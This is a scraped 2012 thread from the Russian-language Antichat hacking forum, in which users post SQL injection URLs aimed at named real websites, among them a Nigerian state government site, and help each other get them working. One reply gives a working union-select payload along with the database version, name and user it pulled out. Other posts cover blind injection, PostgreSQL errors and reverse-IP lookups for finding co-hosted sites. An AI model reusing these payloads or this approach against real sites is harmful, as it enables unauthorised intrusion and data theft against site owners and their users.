HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #19671  
Старый 20.02.2012, 20:06
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от lightangel  
Код:
http://www.jigawastate.gov.ng/contentpage.php?id=-255'+/!*group*/+by+/!*concat*/(left(version(),64),floor(rand(0)*2))+having+min(0)+--+
I tried most injections but do not work on it.
http://www.jigawastate.gov.ng/contentpage.php?id=-255'+/*!union+select*/+1,concat_ws(0x3a,version(),database(),user()),3,4 ,5,6,7,8,9,0+--+

5.1.56:jigawa_jigawa:jigawa@localhost

use google to translate this: КУРИ МАНУАЛЫ БЛЕАТЬ !11
 
Ответить с цитированием

  #19672  
Старый 21.02.2012, 00:56
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141

Репутация: 1013
По умолчанию

как узнать сайты на серве, если хттпд конфиги не доступны?
 
Ответить с цитированием

  #19673  
Старый 21.02.2012, 01:23
BLurpi^_^
Участник форума
Регистрация: 09.02.2011
Сообщений: 218
С нами:
8029046

Репутация: 9
По умолчанию

Цитата:
Сообщение от faza02  
как узнать сайты на серве, если хттпд конфиги не доступны?
reverse-ip\открываешь индексный файл, ищешь нем строку, уникальную на твой взгляд и гуглишь в кавычках
 
Ответить с цитированием

  #19674  
Старый 21.02.2012, 02:48
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141

Репутация: 1013
По умолчанию

угу, да, еще можно заглянуть в скл базу, сайтов больше 20

нужны именно варианты с конфигами
 
Ответить с цитированием

  #19675  
Старый 21.02.2012, 05:07
lightangel
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами:
7638806

Репутация: -6
По умолчанию

Код:
http://www.oistbpl.com/groupinfo.php?show=-1+/*!union+select*/+1,2,3,4,5,6+--+
Why is this showing 500 Internal Server Error?

Haven't seen this before in SQL.
 
Ответить с цитированием

  #19676  
Старый 21.02.2012, 11:33
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от lightangel  
Код:
http://www.oistbpl.com/groupinfo.php?show=-1+/*!union+select*/+1,2,3,4,5,6+--+
Why is this showing 500 Internal Server Error?
Haven't seen this before in SQL.
крути как слепую
 
Ответить с цитированием

  #19677  
Старый 22.02.2012, 00:44
pirat0
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606

Репутация: -1
По умолчанию

Цитата:
Сообщение от kdiler  
Как нибудь можно это дело развить?
может стоить попробывать программой, типа хавиджа
 
Ответить с цитированием

  #19678  
Старый 22.02.2012, 03:23
Melfis
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046

Репутация: 53


По умолчанию

Цитата:
Сообщение от kdiler  
Возникла проблема при попытке раскрутить инъекцию в PostgreSQL.
Имеется адрес вида: При подстановке существующего ID выдается контент, при неверном циферном просто пустая страница.
Подставил кавычку, выдало:
ERROR: invalid input syntax for integer: "`106".
Почитал маны, подставил запрос, скрипт ответил так: .
И что бы я не подставлял, мне приходил подобный ответ.
Как нибудь можно это дело развить?
Либо неправильный синтаксис (где-нить в скуле не хватает скобок и т.п.) или юзается bind / execute
 
Ответить с цитированием

  #19679  
Старый 22.02.2012, 09:46
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426

Репутация: 0
По умолчанию

kdiler, выкладывай ссылку.
 
Ответить с цитированием

  #19680  
Старый 22.02.2012, 22:40
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326

Репутация: 75


По умолчанию

Цитата:
Сообщение от None  
http://www.1000turov.ru/maps.php?id=8+limit+0,0+union+select+user%28%29,us er%28%29--+
Подскажите, где на странице искать вывод?

и тут

Цитата:
Сообщение от None  
http://www.mciti.ru/box.php?id=8+limit+0,0+union+select+1,table_name,3 ,4,5,6,7,8,9,10,11+from+information_schema.tables--+
чего ошибку выдаёт вместо вывода?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.